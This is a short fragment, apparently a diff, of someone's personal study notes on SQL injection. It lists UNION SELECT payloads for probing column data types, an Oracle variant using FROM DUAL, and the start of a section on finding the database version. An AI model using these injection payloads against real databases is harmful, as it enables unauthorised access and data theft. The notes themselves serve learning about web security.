Logan-proj/Cybersecurity_Notes/SQL_Injection.md

 ' UNION SELECT NULL,NULL,’a’,NULL --
 ' UNION SELECT NULL,NULL,NULL,’a’ --
 ```
+ - When determining the sata type from an *Oricle* database you will need to use the from clause.
+    - Example: `' UNION SELECT ‘a’,NULL FROM DUAL--`

 ## Database version
 ### You can query the database to determine its type and version.
 This information is useful when formulating more complicated attacks.